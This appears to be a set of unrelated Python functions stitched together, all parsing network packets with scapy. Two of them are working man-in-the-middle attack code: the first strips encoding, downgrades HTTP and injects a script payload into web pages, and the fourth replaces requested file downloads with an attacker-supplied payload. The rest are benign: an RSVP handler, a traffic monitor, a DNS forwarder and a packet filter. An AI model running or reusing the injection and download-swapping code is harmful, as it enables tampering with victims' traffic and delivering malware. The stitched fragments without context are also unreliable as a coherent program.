def process_packet(pkt): scapy_pkt = IP(pkt.get_payload()) if (scapy_pkt.haslayer(TCP) and scapy_pkt.haslayer(Raw)): tcp = scapy_pkt.getlayer(TCP) raw_load = scapy_pkt.getlayer(Raw).load # If destination port is port 80, most likely a HTTP request, else HTTP response if (tcp.dport == 80 and raw_load): #print("[+] Request") # Strip reqeuest of any encoding (such as compression) raw_load = re.sub(b"Accept-Encoding:.*?\\r\\n", b'', raw_load) # Change the request from HTTP/1.1 to HTTP/1.0 so content gets sent all at once raw_load = raw_load.replace(b"HTTP/1.1", b"HTTP/1.0") elif (tcp.sport == 80 and raw_load): content_length = re.search(b"(?:Content-Length:\s)(\d*)", raw_load) raw_load = raw_load.replace(b"</body>", INJECTION + b"</body>") # Recalculate the content length of the HTML page if (content_length and b"text/html" in raw_load): #print("[+] Attempting to inject code into response payload") content_length = content_length.group(1) new_content_length = str(int(content_length) + len(INJECTION)).encode() raw_load = raw_load.replace(content_length, new_content_length) if (raw_load != scapy_pkt.getlayer(Raw).load): scapy_pkt = set_load(scapy_pkt, raw_load) scapy_pkt = raw(scapy_pkt.__class__(raw(scapy_pkt))) pkt.set_payload(scapy_pkt) pkt.accept()
def process_packet(pkt): data = IP(pkt) rsvp_class = data.getlayer('RSVP').getfieldval('Class') if rsvp_class == 0x01: callback = process_path(data) process_callback( callback, lambda: process_path_last_hop(callback.request, callback. data, callback.key)) if rsvp_class == 0x02: callback = process_resv(data) process_callback( callback, lambda: process_resv_last_hop(callback.request, callback. data, callback.key)) if rsvp_class == 0x05: callback = process_path_tear(data) process_callback( callback, lambda: process_pathtear_last_hop( callback.request, callback.data, callback.key)) if rsvp_class == 0x06: callback = process_resv_tear(data) process_callback( callback, lambda: process_resvtear_last_hop( callback.request, callback.data, callback.key)) if rsvp_class == 0x03: callback = process_path_err(data) process_callback( callback, lambda: process_patherr_last_hop( callback.request, callback.data, callback.key)) if rsvp_class == 0x04: callback = process_resv_err(data) process_callback( callback, lambda: process_resverr_last_hop( callback.request, callback.data, callback.key))
def monitor_data_parse(self, obj): # get mac srcMAC = [] dstMAC = [] # 目的MAC for i in range(6): srcMAC.append(obj.sourceMAC[i]) dstMAC.append(obj.destMAC[i]) tmp = [] for i in range(0, obj.dataLen - 1): tmp.append(hex(obj.frameData.rawData[i])[2:]) payload = self.normalize_packet(tmp) ethType = payload[:2] payload = payload[2:] payload = b''.join([bytes().fromhex(i) for i in payload]) res = IP(payload) if res.getlayer(TCP) is None: # 没有解析到TCP的数据 return srcIp = res["IP"].src dstIp = res["IP"].dst proto = res["IP"].proto sport = res["TCP"].sport dport = res["TCP"].dport seq = res["TCP"].seq ack = res["TCP"].ack flags = int(res["TCP"].flags) window = res["TCP"].window try: raw = res["TCP"].load except: raw = b'' payload_len = len(raw) MessageRecorder.add(srcIp, dstIp, sport, dport, srcMAC=srcMAC, dstMAC=dstMAC, srcIp=srcIp, dstIp=dstIp, srcPort=sport, dstPort=dport, ethType=ethType, proto=proto, seq=seq, ack=ack, flags=flags, window=window, raw=raw, payload_len=payload_len, timestamp=time.time())
def process_packet(pkt): global ACK_LIST scapy_pkt = IP(pkt.get_payload()) if (scapy_pkt.haslayer(TCP)): tcp = scapy_pkt.getlayer(TCP) raw_layer = scapy_pkt.getlayer(Raw).load if scapy_pkt.haslayer( Raw) else None # If destination port is port 80, most likely a HTTP request, else HTTP response if (tcp.dport == 80 and raw_layer): if (FILE_EXT in raw_layer and LOAD_KEYWORD not in raw_layer): ACK_LIST.append(tcp.ack) elif (tcp.sport == 80 and (tcp.seq in ACK_LIST) and raw_layer): ACK_LIST.remove(tcp.seq) scapy_pkt = set_load(scapy_pkt, CUSTOM_LOAD) # Use the class instance to recalculate the chksum and len fields for us # Accepts a packet in bytes format, then casted back into bytes for payload scapy_pkt = raw(scapy_pkt.__class__(raw(scapy_pkt))) # Update the current packets payload with the payload of our spoofed one pkt.set_payload(scapy_pkt) pkt.accept()
def __send_request(self, package): org_layer_DNS = package.getlayer(DNS) package_request = \ IP(dst=IP_DNS) / \ UDP(dport=53) / \ DNS(id=org_layer_DNS.id, qd=org_layer_DNS.qd) send(package_request, count=1) self.__log('info', f'{IP_HOST} -> {IP_DNS}', prefixes=['request'], suffixes=[ package.getlayer(DNSQR).qname.decode(), package.getlayer(DNSQR).qtype ]) return package_request.getlayer(DNS).id
def common_worker(payload: Packet, packets: list, tcp_sessions, cb_listener, callbacks: list, pkt_counter: Counter, ses_counter: Counter, bad_sessions: list): data = payload.get_payload() pkt = IP(data) direction = Constants.DIRECTION_INPUT if pkt.fields[ 'dst'] == '192.168.2.15' else Constants.DIRECTION_OUTPUT tcp_pkt = None allow = True t = 1.5 ave = 0 sum = 0 port = 0 proto = 'other' session_number = None if pkt.proto == 0x06: # TCP tcp_pkt = pkt.getlayer(1) port = tcp_pkt.fields['dport'] proto = 'TCP' good_sessions = 0 for s in tcp_sessions: if s.valid: sum += s.length good_sessions += 1 ave = sum / good_sessions if good_sessions > 0 else sum Logger.debug("AVE: " + str(ave)) Logger.debug("COUNT: " + str(good_sessions)) Logger.debug("sum" + str(sum)) session_number = TCPParser.parseTCPConnection( direction, data, pkt, tcp_pkt, tcp_sessions, ses_counter) # Logger.info("curr: "+str(tcp_sessions[session_number].length)) if ave != 0 and abs(tcp_sessions[session_number].length / ave) > t: Logger.debug("!!! " + str(abs(tcp_sessions[session_number].length / ave))) allow = False # allow = CommonProcess.static_filter(data, ip_pkt=pkt, tcp_pkt=tcp_pkt, direction=direction) else: allow = CommonProcess.static_filter(data, ip_pkt=pkt, direction=direction) if allow: Logger.debug("Accepted") pkt_counter.labels(protocol=pkt.proto, action='accept', port=port, direction=direction).inc() payload.accept() else: Logger.debug("Dropped!!!") pkt_counter.labels(protocol=pkt.proto, action='drop', port=port, direction=direction).inc() payload.drop() if session_number is not None: tcp_sessions[session_number].valid = False return payload